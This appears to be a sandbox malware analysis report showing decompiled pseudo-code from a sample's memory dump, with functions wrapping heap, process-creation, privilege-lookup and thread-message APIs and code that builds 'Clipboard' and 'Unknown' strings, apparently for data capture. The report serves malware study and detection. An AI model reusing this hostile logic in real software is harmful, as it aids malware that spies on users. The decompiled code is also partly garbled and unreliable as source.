                                              • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                              • Instruction ID: 4c2b1df36aa7b29bb0fae7ecfb93cd688d28708cc461f9fe29ca3c1f3973371e
                                              • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                              • Instruction Fuzzy Hash: EC213CB2D442085BCB10E6649D42BFF73AC9B50304F04057FF989A3181FA38BB498BA7
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 87%
                                              			E00418512(void* __ebx, void* __ecx, intOrPtr _a4, char _a8, long _a12, long _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40) {
                                              				void* _v1;
                                              				void* __ebp;
                                              				void* _t25;
                                              				void* _t33;
                                              
                                              				asm("in eax, 0x3b");
                                              				if(__ebx + 1 <= 0) {
                                              					_t22 = _a4;
                                              					E00418DD0(_t33, _a4, _a4 + 0xc70,  *((intOrPtr*)(_t22 + 0x10)), 0, 0x34);
                                              					_t6 =  &_a8; // 0x413526
                                              					_t25 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                              					return _t25;
                                              				} else {
                                              					__ecx = __ecx + 1;
                                              					 *((intOrPtr*)(__ecx - 0x19d7d464)) = __ebx;
                                              					if (__ecx < 0) goto L6;
                                              				}
                                              			}







                                              0x00418512
                                              0x00418515
                                              0x004184a3
                                              0x004184b7
                                              0x004184c2
                                              0x004184cd
                                              0x004184d1
                                              0x00418517
                                              0x00418517
                                              0x00418519
                                              0x0041851f
                                              0x00418520

                                              APIs
                                              • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD
                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                              • CreateProcessInternalW.KERNELBASE(00407C1D,00407C45,004079DD,00000010,?,00000044,?,?,?,00000044,E|@D,00000010,004079DD,00407C45,00407C1D,00407C89), ref: 004185A4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Process$AllocateCreateExitHeapInternal
                                              • String ID: &5A
                                              • API String ID: 2538108539-1617645808
                                              • Opcode ID: f3a22d0aade042e1be083db4b5b2a62910f892bccafab9e8ee1972729172f5b7
                                              • Instruction ID: 1ed546ac70a4fa69066f3ecb289bb14b8005791e05c66a09753c391c1b77cfbd
                                              • Opcode Fuzzy Hash: f3a22d0aade042e1be083db4b5b2a62910f892bccafab9e8ee1972729172f5b7
                                              • Instruction Fuzzy Hash: BA2138B1200208ABCB14DF99DC85EE777ADEF88754F11825DFA0D9B241C630E901CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 37%
                                              			E0041854F(void* __ebx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a44, char _a48, intOrPtr _a52) {
                                              				char _v5;
                                              				intOrPtr _v117;
                                              				signed char _t21;
                                              				void* _t26;
                                              				intOrPtr _t29;
                                              				intOrPtr _t35;
                                              				void* _t39;
                                              				void* _t40;
                                              				intOrPtr* _t41;
                                              				void* _t43;
                                              
                                              				_v117 = __edx;
                                              				_t19 = _a4;
                                              				_t4 = _t19 + 0xa14; // 0x58de852
                                              				_t5 = _t19 + 0xc80; // 0x408909
                                              				_t41 = _t5;
                                              				E00418DD0(_t39, _a4, _t41,  *_t4, 0, 0x37);
                                              				_t35 = _a52;
                                              				_t7 =  &_a48; // 0x407c45
                                              				_t21 =  *_t7;
                                              				_t29 = _a44;
                                              				 *(__ebx - 0x74adeb3c) =  *(__ebx - 0x74adeb3c) ^ _t21;
                                              				_t26 =  *((intOrPtr*)( *_t41))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _t35, _t29,  &_v5, _t40, _t43); // executed
                                              				return _t26;
                                              			}













                                              0x0041854f
                                              0x00418553
                                              0x00418556
                                              0x00418562
                                              0x00418562
                                              0x0041856a
                                              0x0041856f
                                              0x00418572
                                              0x00418572
                                              0x00418575
                                              0x00418577
                                              0x004185a4
                                              0x004185a8

                                              APIs
                                              • CreateProcessInternalW.KERNELBASE(00407C1D,00407C45,004079DD,00000010,?,00000044,?,?,?,00000044,E|@D,00000010,004079DD,00407C45,00407C1D,00407C89), ref: 004185A4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInternalProcess
                                              • String ID: E|@D
                                              • API String ID: 2186235152-1370303659
                                              • Opcode ID: bba775424ae61b69381b11a7fa84657fcec93d1ca160a33124552a8a05a7ae29
                                              • Instruction ID: f4e0e9482e5859832fe7bbcfafcc7bc9c9ece151ca07f14e514e7862d3903a08
                                              • Opcode Fuzzy Hash: bba775424ae61b69381b11a7fa84657fcec93d1ca160a33124552a8a05a7ae29
                                              • Instruction Fuzzy Hash: 71019DB2210108AFCB58CF99DC80EEB77A9AF8C354F158259BA0DA7251C630E851CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 37%
                                              			E00418550(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a44, char _a48, intOrPtr _a52) {
                                              				char _v5;
                                              				signed char _t19;
                                              				void* _t24;
                                              				intOrPtr _t27;
                                              				intOrPtr _t31;
                                              				void* _t35;
                                              				intOrPtr* _t36;
                                              
                                              				_t17 = _a4;
                                              				_t2 = _t17 + 0xa14; // 0x58de852
                                              				_t3 = _t17 + 0xc80; // 0x408909
                                              				_t36 = _t3;
                                              				E00418DD0(_t35, _a4, _t36,  *_t2, 0, 0x37);
                                              				_t31 = _a52;
                                              				_t5 =  &_a48; // 0x407c45
                                              				_t19 =  *_t5;
                                              				_t27 = _a44;
                                              				 *(__ebx - 0x74adeb3c) =  *(__ebx - 0x74adeb3c) ^ _t19;
                                              				_t24 =  *((intOrPtr*)( *_t36))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _t31, _t27,  &_v5); // executed
                                              				return _t24;
                                              			}










                                              0x00418553
                                              0x00418556
                                              0x00418562
                                              0x00418562
                                              0x0041856a
                                              0x0041856f
                                              0x00418572
                                              0x00418572
                                              0x00418575
                                              0x00418577
                                              0x004185a4
                                              0x004185a8

                                              APIs
                                              • CreateProcessInternalW.KERNELBASE(00407C1D,00407C45,004079DD,00000010,?,00000044,?,?,?,00000044,E|@D,00000010,004079DD,00407C45,00407C1D,00407C89), ref: 004185A4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInternalProcess
                                              • String ID: E|@D
                                              • API String ID: 2186235152-1370303659
                                              • Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                              • Instruction ID: 94e036b50fa194e4b03716d33ce7f49ba96107573156df30ea47add9cf45f2e3
                                              • Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                              • Instruction Fuzzy Hash: 1E015FB2214208ABCB54DF89DC81EEB77ADAF8C754F158258BA0D97251D630E851CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E004184A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                              				void* _t10;
                                              				void* _t15;
                                              
                                              				E00418DD0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                              				_t6 =  &_a8; // 0x413526
                                              				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                              				return _t10;
                                              			}





                                              0x004184b7
                                              0x004184c2
                                              0x004184cd
                                              0x004184d1

                                              APIs
                                              • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID: &5A
                                              • API String ID: 1279760036-1617645808
                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                              • Instruction ID: 6eed1dfa6fdd4b996c8079955bb5808ea645f65af4e2973490dba1d49a230398
                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                              • Instruction Fuzzy Hash: 94E012B1200208ABDB14EF99DC41EA777ACAF88654F118559BA085B282CA30F9108AB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 82%
                                              			E00407270(void* __eflags, intOrPtr _a4, long _a8) {
                                              				char _v67;
                                              				char _v68;
                                              				void* _t12;
                                              				intOrPtr* _t13;
                                              				int _t14;
                                              				long _t21;
                                              				intOrPtr* _t25;
                                              				void* _t26;
                                              				void* _t30;
                                              
                                              				_t30 = __eflags;
                                              				_v68 = 0;
                                              				E00419D30( &_v67, 0, 0x3f);
                                              				E0041A910( &_v68, 3);
                                              				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
                                              				_t13 = E00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                              				_t25 = _t13;
                                              				if(_t25 != 0) {
                                              					_t21 = _a8;
                                              					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                              					_t32 = _t14;
                                              					if(_t14 == 0) {
                                              						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                              					}
                                              					return _t14;
                                              				}
                                              				return _t13;
                                              			}












                                              0x00407270
                                              0x0040727f
                                              0x00407283
                                              0x0040728e
                                              0x0040729e
                                              0x004072ae
                                              0x004072b3
                                              0x004072ba
                                              0x004072bd
                                              0x004072ca
                                              0x004072cc
                                              0x004072ce
                                              0x004072eb
                                              0x004072eb
                                              0x00000000
                                              0x004072ed
                                              0x004072f2

                                              APIs
                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                              • Instruction ID: 34c16447600cfe3bfc53875ba7b31b7f06d917fb68e10caa6e1b72df1d8a1719
                                              • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                              • Instruction Fuzzy Hash: 9901D431A8022877E720A6959C03FFE776C5B00B55F05046EFF04BA1C2E6A87A0542EA
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E004184E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                              				char _t10;
                                              				void* _t15;
                                              
                                              				_t3 = _a4 + 0xc74; // 0xc74
                                              				E00418DD0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                              				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                              				return _t10;
                                              			}





                                              0x004184ef
                                              0x004184f7
                                              0x0041850d
                                              0x00418511

                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                              • Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                              • Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00418640(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                              				int _t10;
                                              				void* _t15;
                                              
                                              				E00418DD0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                              				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                              				return _t10;
                                              			}





                                              0x0041865a
                                              0x00418670
                                              0x00418674

                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                              • Instruction ID: efef6450e86da2b54d6b49fe3c32415886d6c73e427b64be19593e81b86a73e4
                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                              • Instruction Fuzzy Hash: 1CE01AB12002086BDB10DF49DC85EE737ADAF88650F018159BA0857281C934E8108BF5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 68%
                                              			E004184D3(void* __eax, void* __ebx, void* __ecx, void* _a4, long _a8, int _a12) {
                                              				intOrPtr _v0;
                                              				char _t20;
                                              				void* _t30;
                                              
                                              				asm("in eax, dx");
                                              				if(__ebx + 1 >= 0) {
                                              					_t14 = _a8;
                                              					E00418DD0(_t30, _a8, _a8 + 0xc7c,  *((intOrPtr*)(_t14 + 0xa14)), 0, 0x36);
                                              					ExitProcess(_a12);
                                              				}
                                              				asm("out 0x1a, al");
                                              				_t17 = _v0;
                                              				_push(_t31);
                                              				_t4 = _t17 + 0xc74; // 0xc74
                                              				E00418DD0(_t30, _v0, _t4,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
                                              				_t20 = RtlFreeHeap(_a4, _a8, _a12); // executed
                                              				return _t20;
                                              			}






                                              0x004184da
                                              0x004184dc
                                              0x00418523
                                              0x0041853a
                                              0x00418548
                                              0x00418548
                                              0x004184de
                                              0x004184e3
                                              0x004184e9
                                              0x004184ef
                                              0x004184f7
                                              0x0041850d
                                              0x00418511

                                              APIs
                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: c4e6f638c6bbfb625a412af3bc006a6bbc3782b9f9ef2934f87e239d32e6e085
                                              • Instruction ID: afa1998189b3a6a3451e3260206c35fed0aec0e5cce615273e8749b3ddd7f0ba
                                              • Opcode Fuzzy Hash: c4e6f638c6bbfb625a412af3bc006a6bbc3782b9f9ef2934f87e239d32e6e085
                                              • Instruction Fuzzy Hash: 59E08672210200BBD610DF54CC85FD337A8EF55350F05815DF65C9B242C534A640CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                              • Instruction ID: 0124507ddd2f9c2d15af78755faa13525d8eeaf852c7518965348cd9efebe569
                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                              • Instruction Fuzzy Hash: A8D012716003187BD620DF99DC85FD7779CDF48790F018169BA1C5B281C571BA0086E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: d8862a7ac2e586e0a32f9fa74f150ebf2468bfffac72ae5868077a25340aab74
                                              • Instruction ID: d1d0d51aee9570845ab81841e6251235ac245dc2966a6f7f91324c03916397fb
                                              • Opcode Fuzzy Hash: d8862a7ac2e586e0a32f9fa74f150ebf2468bfffac72ae5868077a25340aab74
                                              • Instruction Fuzzy Hash: 0DB09B71D014C5C5D611E7A44608F17790177D0755F17C151D2024755B4778C195F5B5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              C-Code - Quality: 54%
                                              			E00406AC2(void* __eax, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a13) {
                                              				short _v4;
                                              				intOrPtr _v8;
                                              				char _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				char _v28;
                                              				short _v30;
                                              				char _v34;
                                              				char _v38;
                                              				short _v40;
                                              				intOrPtr _v44;
                                              				intOrPtr _v48;
                                              				intOrPtr _v52;
                                              				intOrPtr _v56;
                                              				char _v60;
                                              				void* __ebx;
                                              				void* __ebp;
                                              				void* _t52;
                                              				short _t60;
                                              				void* _t71;
                                              				void* _t74;
                                              				void* _t78;
                                              
                                              				_t71 = __esi;
                                              				asm("lahf");
                                              				if(__eflags == 0) {
                                              					L12:
                                              					asm("les ecx, [ebx+esi]");
                                              					_t78 = _t74;
                                              					_v4 = _t60;
                                              					_t57 = _t71 + 0x4464;
                                              					_v12 = 0xa000d;
                                              					_v8 = 0xa000d;
                                              					_v60 = 0x6c0043;
                                              					_v56 = 0x700069;
                                              					_v52 = 0x6f0062;
                                              					_v48 = 0x720061;
                                              					_v44 = 0x64;
                                              					_v40 = 0;
                                              					_v38 = 0;
                                              					_v34 = 0;
                                              					_v30 = 0;
                                              					 *((intOrPtr*)( *((intOrPtr*)(_t71 + 0xcc0))))(_t71 + 0x4464, 0x104);
                                              					 *((intOrPtr*)( *((intOrPtr*)(_t71 + 0xcbc))))(0);
                                              					__eflags = 0 - 0x40;
                                              					if(0 <= 0x40) {
                                              						__eflags = 0;
                                              						if(0 == 0) {
                                              							_v28 = 0x6e0055;
                                              							_v24 = 0x6e006b;
                                              							_v20 = 0x77006f;
                                              							_v16 = 0x6e;
                                              							E00419CB0(_t57,  &_v28, 0x10);
                                              							_t78 = _t78 + 0xc;
                                              						}
                                              					} else {
                                              						 *((short*)(_t71 + 0x44e4)) = 0;
                                              					}
                                              					_t68 = _t71 + 0x4ce4;
                                              					E00419CB0(_t71 + 0x4ce4,  &_v60, 0x14);
                                              					E0041A110(_t71 + 0x4ce4, _t71, _t71 + 0x4ce4,  &_v12, 0);
                                              					E0041A110(_t68, _t71, _t68, _t57, 0);
                                              					E0041A110(_t68, _t71, _t68,  &_v12, 0);
                                              					E0041A110(_t68, _t71, _t68, _a12, 0);
                                              					 *((intOrPtr*)(_t71 + 0xa08)) = E00419FA0(_t68) + _t47;
                                              					__eflags = E00419FA0(_t68) + _t49;
                                              					E00419CB0( *((intOrPtr*)(_t71 + 0xa04)), _t68, E00419FA0(_t68) + _t49);
                                              					_t52 = E0040CE00(_t71, 0x13);
                                              					goto L17;
                                              				} else {
                                              					if(__eflags < 0) {
                                              						L11:
                                              						__eflags = __al;
                                              						__eax = E00419CB0(__ebx, __edx, __ebp);
                                              						goto L12;
                                              					} else {
                                              						if(__eflags == 0) {
                                              							asm("scasd");
                                              							return 1;
                                              						} else {
                                              							asm("fcomp3 st7");
                                              							asm("iretd");
                                              							__esp = __esp + 1;
                                              							 *((char*)(__esi - 0x741374ab)) = __al;
                                              							_push(__ebp);
                                              							__ebp = __esp;
                                              							__eax = _a13;
                                              							__esp = __esp - 0x3c;
                                              							__eax = E00419FA0(_a13);
                                              							__eflags = __eax - 0x1000;
                                              							if(__eax <= 0x1000) {
                                              								_push(__esi);
                                              								__esi = _a4;
                                              								__ecx =  *((intOrPtr*)(__esi + 0x7d8));
                                              								__eflags = __ecx;
                                              								if(__ecx != 0) {
                                              									_push(__ebx);
                                              									_push(__edi);
                                              									__edi = __eax + __eax;
                                              									__ebx = __ecx + 0x1ff560;
                                              									__ecx = _a8;
                                              									__eax = E00419FC0(_a8, __ebx, __edi);
                                              									 *__eax =  *__eax + __eax;
                                              									__esp = __esp + 0xc;
                                              									__eflags = __eax;
                                              									if(__eax == 0) {
                                              										__edx = _a8;
                                              										goto L11;
                                              									}
                                              									L17:
                                              								}
                                              							}
                                              							return _t52;
                                              						}
                                              					}
                                              				}
                                              			}


























                                              0x00406ac2
                                              0x00406ac2
                                              0x00406ac4
                                              0x00406b2c
                                              0x00406b2c
                                              0x00406b2f
                                              0x00406b37
                                              0x00406b41
                                              0x00406b48
                                              0x00406b4f
                                              0x00406b56
                                              0x00406b5d
                                              0x00406b64
                                              0x00406b6b
                                              0x00406b72
                                              0x00406b79
                                              0x00406b7d
                                              0x00406b80
                                              0x00406b83
                                              0x00406b87
                                              0x00406b90
                                              0x00406b92
                                              0x00406b95
                                              0x00406ba2
                                              0x00406ba4
                                              0x00406bad
                                              0x00406bb4
                                              0x00406bbb
                                              0x00406bc2
                                              0x00406bc9
                                              0x00406bce
                                              0x00406bce
                                              0x00406b97
                                              0x00406b99
                                              0x00406b99
                                              0x00406bd7
                                              0x00406bde
                                              0x00406bea
                                              0x00406bf3
                                              0x00406bff
                                              0x00406c0b
                                              0x00406c1c
                                              0x00406c2d
                                              0x00406c32
                                              0x00406c3a
                                              0x00000000
                                              0x00406ac6
                                              0x00406ac6
                                              0x00406b21
                                              0x00406b22
                                              0x00406b26
                                              0x00000000
                                              0x00406ac8
                                              0x00406ac8
                                              0x00406aa8
                                              0x00406ab8
                                              0x00406aca
                                              0x00406aca
                                              0x00406acc
                                              0x00406acd
                                              0x00406ace
                                              0x00406ad0
                                              0x00406ad1
                                              0x00406ad3
                                              0x00406ad6
                                              0x00406ada
                                              0x00406ae2
                                              0x00406ae7
                                              0x00406aed
                                              0x00406aee
                                              0x00406af1
                                              0x00406af7
                                              0x00406af9
                                              0x00406aff
                                              0x00406b00
                                              0x00406b01
                                              0x00406b04
                                              0x00406b0a
                                              0x00406b10
                                              0x00406b13
                                              0x00406b15
                                              0x00406b18
                                              0x00406b1a
                                              0x00406b20
                                              0x00000000
                                              0x00406b20
                                              0x00406c42
                                              0x00406c43
                                              0x00406c44
                                              0x00406c48
                                              0x00406c48
                                              0x00406ac8
                                              0x00406ac6

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: C$a$b$d$i
                                              • API String ID: 0-2334916691
                                              • Opcode ID: 43218773b157b622986cc7113b039af5845d6eeae707c7a47e9bbce203d4c3c5
                                              • Instruction ID: e76c46f44748b4024c98f4b5004a6fdceb1eb105ab67c419daa92300f162c794
                                              • Opcode Fuzzy Hash: 43218773b157b622986cc7113b039af5845d6eeae707c7a47e9bbce203d4c3c5
                                              • Instruction Fuzzy Hash: 6831C7B1E00208BADB10EFA5EC82FFEB3B8AF85704F00451EF515A7242D779595587AD
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 23%
                                              			E00406AA2(short __ecx, void* __eflags) {
                                              				signed char _t30;
                                              				void* _t51;
                                              				short _t55;
                                              				intOrPtr _t59;
                                              				void* _t66;
                                              				void* _t69;
                                              				void* _t76;
                                              
                                              				_t55 = __ecx;
                                              				asm("adc ebp, edx");
                                              				if(__eflags < 0) {
                                              					 *_t30 =  *_t30 + _t30;
                                              					__eflags = _t30;
                                              					if(_t30 == 0) {
                                              						_t59 =  *((intOrPtr*)(_t69 + 0xc));
                                              						__eflags = _t30 | 0x00000057;
                                              						E00419CB0(_t51, _t59, _t69);
                                              						asm("les ecx, [ebx+esi]");
                                              						_t76 = _t69;
                                              						_pop(_t69);
                                              						 *((short*)(_t69 - 4)) = _t55;
                                              						_t53 = _t66 + 0x4464;
                                              						 *((intOrPtr*)(_t69 - 0xc)) = 0xa000d;
                                              						 *((intOrPtr*)(_t69 - 8)) = 0xa000d;
                                              						 *((intOrPtr*)(_t69 - 0x3c)) = 0x6c0043;
                                              						 *((intOrPtr*)(_t69 - 0x38)) = 0x700069;
                                              						 *((intOrPtr*)(_t69 - 0x34)) = 0x6f0062;
                                              						 *((intOrPtr*)(_t69 - 0x30)) = 0x720061;
                                              						 *((intOrPtr*)(_t69 - 0x2c)) = 0x64;
                                              						 *((short*)(_t69 - 0x28)) = 0;
                                              						 *((intOrPtr*)(_t69 - 0x26)) = 0;
                                              						 *((intOrPtr*)(_t69 - 0x22)) = 0;
                                              						 *((short*)(_t69 - 0x1e)) = 0;
                                              						 *((intOrPtr*)( *((intOrPtr*)(_t66 + 0xcc0))))(_t66 + 0x4464, 0x104);
                                              						 *((intOrPtr*)( *((intOrPtr*)(_t66 + 0xcbc))))(0);
                                              						__eflags = 0 - 0x40;
                                              						if(0 <= 0x40) {
                                              							__eflags = 0;
                                              							if(0 == 0) {
                                              								 *((intOrPtr*)(_t69 - 0x1c)) = 0x6e0055;
                                              								 *((intOrPtr*)(_t69 - 0x18)) = 0x6e006b;
                                              								 *((intOrPtr*)(_t69 - 0x14)) = 0x77006f;
                                              								 *((intOrPtr*)(_t69 - 0x10)) = 0x6e;
                                              								E00419CB0(_t53, _t69 - 0x1c, 0x10);
                                              								_t76 = _t76 + 0xc;
                                              							}
                                              						} else {
                                              							 *((short*)(_t66 + 0x44e4)) = 0;
                                              						}
                                              						_t64 = _t66 + 0x4ce4;
                                              						E00419CB0(_t66 + 0x4ce4, _t69 - 0x3c, 0x14);
                                              						E0041A110(_t66 + 0x4ce4, _t66, _t66 + 0x4ce4, _t69 - 0xc, 0);
                                              						E0041A110(_t64, _t66, _t64, _t53, 0);
                                              						E0041A110(_t64, _t66, _t64, _t69 - 0xc, 0);
                                              						E0041A110(_t64, _t66, _t64,  *((intOrPtr*)(_t69 + 0xc)), 0);
                                              						 *((intOrPtr*)(_t66 + 0xa08)) = E00419FA0(_t64) + _t42;
                                              						__eflags = E00419FA0(_t64) + _t44;
                                              						E00419CB0( *((intOrPtr*)(_t66 + 0xa04)), _t64, E00419FA0(_t64) + _t44);
                                              						_t30 = E0040CE00(_t66, 0x13);
                                              					}
                                              					return _t30;
                                              				} else {
                                              					asm("cli");
                                              					_push(0xffffffaf);
                                              					asm("scasd");
                                              					return 1;
                                              				}
                                              			}










                                              0x00406aa2
                                              0x00406aa2
                                              0x00406aa4
                                              0x00406b13
                                              0x00406b18
                                              0x00406b1a
                                              0x00406b20
                                              0x00406b22
                                              0x00406b26
                                              0x00406b2c
                                              0x00406b2f
                                              0x00406b2f
                                              0x00406b37
                                              0x00406b41
                                              0x00406b48
                                              0x00406b4f
                                              0x00406b56
                                              0x00406b5d
                                              0x00406b64
                                              0x00406b6b
                                              0x00406b72
                                              0x00406b79
                                              0x00406b7d
                                              0x00406b80
                                              0x00406b83
                                              0x00406b87
                                              0x00406b90
                                              0x00406b92
                                              0x00406b95
                                              0x00406ba2
                                              0x00406ba4
                                              0x00406bad
                                              0x00406bb4
                                              0x00406bbb
                                              0x00406bc2
                                              0x00406bc9
                                              0x00406bce
                                              0x00406bce
                                              0x00406b97
                                              0x00406b99
                                              0x00406b99
                                              0x00406bd7
                                              0x00406bde
                                              0x00406bea
                                              0x00406bf3
                                              0x00406bff
                                              0x00406c0b
                                              0x00406c1c
                                              0x00406c2d
                                              0x00406c32
                                              0x00406c3a
                                              0x00406c3f
                                              0x00406c48
                                              0x00406aa6
                                              0x00406aa6
                                              0x00406aa7
                                              0x00406aa8
                                              0x00406ab8
                                              0x00406ab8

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: C$a$b$d$i
                                              • API String ID: 0-2334916691
                                              • Opcode ID: 515cbd1d688cb2e24db0e980ba2879dfe6454d645799f915690ef55488c76b10
                                              • Instruction ID: f3c74023adc1cf6cf4df2934c757a26496a9e7a59011964b0e5a2185914ff36e
